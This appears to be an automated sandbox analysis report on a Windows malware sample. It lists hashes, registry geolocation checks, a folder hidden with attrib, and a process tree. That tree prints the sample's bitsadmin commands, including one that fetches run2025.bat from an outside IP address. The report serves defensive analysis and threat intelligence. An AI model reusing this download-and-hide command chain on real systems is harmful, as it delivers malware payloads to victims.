Analysis
-
max time kernel
94s -
max time network
96s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
05-08-2024 14:05
Static task
static1
Behavioral task
behavioral1
Sample
ab69f5c1027fbf46ed1c17fc2f9843d94948df84eeefa2a3548d21329f409f15.exe
Resource
win7-20240705-en
General
-
Target
ab69f5c1027fbf46ed1c17fc2f9843d94948df84eeefa2a3548d21329f409f15.exe
-
Size
126KB
-
MD5
b2dc0f8a36a7e450b11149a8e15ca964
-
SHA1
27fd3d24a969b5b0528b69f1cbd8b293e74a6809
-
SHA256
ab69f5c1027fbf46ed1c17fc2f9843d94948df84eeefa2a3548d21329f409f15
-
SHA512
135b14382607e69e38a1e8ff3795233e0636fa29657e154270595b92804973ed96041d223eda9c71e270970df850a72b5f6b869d4b92fd51522bd52be8e8b933
-
SSDEEP
1536:06/2vO9g8CoiedwWRNxDzaoOeJSZHewWXTW6F8huRUTc333VnvwYXDBHEi4nuQr6:d/2vO9g8CNed7XaoO8SZHBX4
Malware Config
Signatures
-
Download via BitsAdmin 1 TTPs 2 IoCs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
ab69f5c1027fbf46ed1c17fc2f9843d94948df84eeefa2a3548d21329f409f15.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\International\Geo\Nation ab69f5c1027fbf46ed1c17fc2f9843d94948df84eeefa2a3548d21329f409f15.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 19 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
bitsadmin.exebitsadmin.exebitsadmin.exebitsadmin.exebitsadmin.execmd.exeattrib.exebitsadmin.exebitsadmin.exebitsadmin.exeab69f5c1027fbf46ed1c17fc2f9843d94948df84eeefa2a3548d21329f409f15.execmd.exebitsadmin.exebitsadmin.execmd.exebitsadmin.execmd.exebitsadmin.execmd.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bitsadmin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bitsadmin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bitsadmin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bitsadmin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bitsadmin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language attrib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bitsadmin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bitsadmin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bitsadmin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ab69f5c1027fbf46ed1c17fc2f9843d94948df84eeefa2a3548d21329f409f15.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bitsadmin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bitsadmin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bitsadmin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bitsadmin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
Suspicious use of WriteProcessMemory 54 IoCs
Processes:
ab69f5c1027fbf46ed1c17fc2f9843d94948df84eeefa2a3548d21329f409f15.execmd.execmd.execmd.execmd.execmd.exedescription pid process target process PID 4036 wrote to memory of 1760 4036 ab69f5c1027fbf46ed1c17fc2f9843d94948df84eeefa2a3548d21329f409f15.exe cmd.exe PID 4036 wrote to memory of 1760 4036 ab69f5c1027fbf46ed1c17fc2f9843d94948df84eeefa2a3548d21329f409f15.exe cmd.exe PID 4036 wrote to memory of 1760 4036 ab69f5c1027fbf46ed1c17fc2f9843d94948df84eeefa2a3548d21329f409f15.exe cmd.exe PID 1760 wrote to memory of 3592 1760 cmd.exe attrib.exe PID 1760 wrote to memory of 3592 1760 cmd.exe attrib.exe PID 1760 wrote to memory of 3592 1760 cmd.exe attrib.exe PID 1760 wrote to memory of 2028 1760 cmd.exe cmd.exe PID 1760 wrote to memory of 2028 1760 cmd.exe cmd.exe PID 1760 wrote to memory of 2028 1760 cmd.exe cmd.exe PID 2028 wrote to memory of 4348 2028 cmd.exe bitsadmin.exe PID 2028 wrote to memory of 4348 2028 cmd.exe bitsadmin.exe PID 2028 wrote to memory of 4348 2028 cmd.exe bitsadmin.exe PID 1760 wrote to memory of 1756 1760 cmd.exe bitsadmin.exe PID 1760 wrote to memory of 1756 1760 cmd.exe bitsadmin.exe PID 1760 wrote to memory of 1756 1760 cmd.exe bitsadmin.exe PID 1760 wrote to memory of 4472 1760 cmd.exe bitsadmin.exe PID 1760 wrote to memory of 4472 1760 cmd.exe bitsadmin.exe PID 1760 wrote to memory of 4472 1760 cmd.exe bitsadmin.exe PID 1760 wrote to memory of 4236 1760 cmd.exe cmd.exe PID 1760 wrote to memory of 4236 1760 cmd.exe cmd.exe PID 1760 wrote to memory of 4236 1760 cmd.exe cmd.exe PID 4236 wrote to memory of 3192 4236 cmd.exe bitsadmin.exe PID 4236 wrote to memory of 3192 4236 cmd.exe bitsadmin.exe PID 4236 wrote to memory of 3192 4236 cmd.exe bitsadmin.exe PID 1760 wrote to memory of 4564 1760 cmd.exe bitsadmin.exe PID 1760 wrote to memory of 4564 1760 cmd.exe bitsadmin.exe PID 1760 wrote to memory of 4564 1760 cmd.exe bitsadmin.exe PID 1760 wrote to memory of 4968 1760 cmd.exe bitsadmin.exe PID 1760 wrote to memory of 4968 1760 cmd.exe bitsadmin.exe PID 1760 wrote to memory of 4968 1760 cmd.exe bitsadmin.exe PID 1760 wrote to memory of 1916 1760 cmd.exe cmd.exe PID 1760 wrote to memory of 1916 1760 cmd.exe cmd.exe PID 1760 wrote to memory of 1916 1760 cmd.exe cmd.exe PID 1916 wrote to memory of 2932 1916 cmd.exe bitsadmin.exe PID 1916 wrote to memory of 2932 1916 cmd.exe bitsadmin.exe PID 1916 wrote to memory of 2932 1916 cmd.exe bitsadmin.exe PID 1760 wrote to memory of 3284 1760 cmd.exe bitsadmin.exe PID 1760 wrote to memory of 3284 1760 cmd.exe bitsadmin.exe PID 1760 wrote to memory of 3284 1760 cmd.exe bitsadmin.exe PID 1760 wrote to memory of 4576 1760 cmd.exe bitsadmin.exe PID 1760 wrote to memory of 4576 1760 cmd.exe bitsadmin.exe PID 1760 wrote to memory of 4576 1760 cmd.exe bitsadmin.exe PID 1760 wrote to memory of 3300 1760 cmd.exe cmd.exe PID 1760 wrote to memory of 3300 1760 cmd.exe cmd.exe PID 1760 wrote to memory of 3300 1760 cmd.exe cmd.exe PID 3300 wrote to memory of 4436 3300 cmd.exe bitsadmin.exe PID 3300 wrote to memory of 4436 3300 cmd.exe bitsadmin.exe PID 3300 wrote to memory of 4436 3300 cmd.exe bitsadmin.exe PID 1760 wrote to memory of 5060 1760 cmd.exe bitsadmin.exe PID 1760 wrote to memory of 5060 1760 cmd.exe bitsadmin.exe PID 1760 wrote to memory of 5060 1760 cmd.exe bitsadmin.exe PID 1760 wrote to memory of 896 1760 cmd.exe bitsadmin.exe PID 1760 wrote to memory of 896 1760 cmd.exe bitsadmin.exe PID 1760 wrote to memory of 896 1760 cmd.exe bitsadmin.exe -
Views/modifies file attributes 1 TTPs 1 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\ab69f5c1027fbf46ed1c17fc2f9843d94948df84eeefa2a3548d21329f409f15.exe"C:\Users\Admin\AppData\Local\Temp\ab69f5c1027fbf46ed1c17fc2f9843d94948df84eeefa2a3548d21329f409f15.exe"1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4036 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ytmp\t27959.bat" "C:\Users\Admin\AppData\Local\Temp\ab69f5c1027fbf46ed1c17fc2f9843d94948df84eeefa2a3548d21329f409f15.exe" "2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1760 -
C:\Windows\SysWOW64\attrib.exeattrib +h C:\Users\Admin\AppData\Local\Temp\ytmp3⤵
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:3592 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\System32\cmd.exe /c ""Bitsadmin3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2028 -
C:\Windows\SysWOW64\bitsadmin.exeBitsadmin4⤵
- System Location Discovery: System Language Discovery
PID:4348 -
C:\Windows\SysWOW64\bitsadmin.exebitsadmin3⤵
- System Location Discovery: System Language Discovery
PID:1756 -
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /crEaTe pls3⤵
- Download via BitsAdmin
- System Location Discovery: System Language Discovery
PID:4472 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\System32\cmd.exe /c ""Bitsadmin3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4236 -
C:\Windows\SysWOW64\bitsadmin.exeBitsadmin4⤵
- System Location Discovery: System Language Discovery
PID:3192 -
C:\Windows\SysWOW64\bitsadmin.exebitsadmin3⤵
- System Location Discovery: System Language Discovery
PID:4564 -
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /ResUme pls3⤵
- System Location Discovery: System Language Discovery
PID:4968 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\System32\cmd.exe /c ""Bitsadmin3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1916 -
C:\Windows\SysWOW64\bitsadmin.exeBitsadmin4⤵
- System Location Discovery: System Language Discovery
PID:2932 -
C:\Windows\SysWOW64\bitsadmin.exebitsadmin3⤵
- System Location Discovery: System Language Discovery
PID:3284 -
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /CompLete pls3⤵
- System Location Discovery: System Language Discovery
PID:4576 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\System32\cmd.exe /c ""Bitsadmin3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3300 -
C:\Windows\SysWOW64\bitsadmin.exeBitsadmin4⤵
- System Location Discovery: System Language Discovery
PID:4436 -
C:\Windows\SysWOW64\bitsadmin.exebitsadmin3⤵
- System Location Discovery: System Language Discovery
PID:5060 -
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /TRanSfer pls http:164.90.244.116/run2025.bat C:\Users\Public\run2025.bat3⤵
- Download via BitsAdmin
- System Location Discovery: System Language Discovery
PID:896
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD59f9313c2c1cd60650bc4be0175a93d05
SHA153f62a866349d2c08c6bb5c9c7bfad3faf785a77
SHA256380d4be6e794605bb9777361f1c5221f8597e29a4f03c35360b5884e588d2011
SHA51218fd8d7e685371ff9a3506c4a925e2aff927b2da6d6195689ba7c240c28654b6c71aa724eeee66a181b2f6f231bcd24635b314c54c2d80713e3c89937a4b213e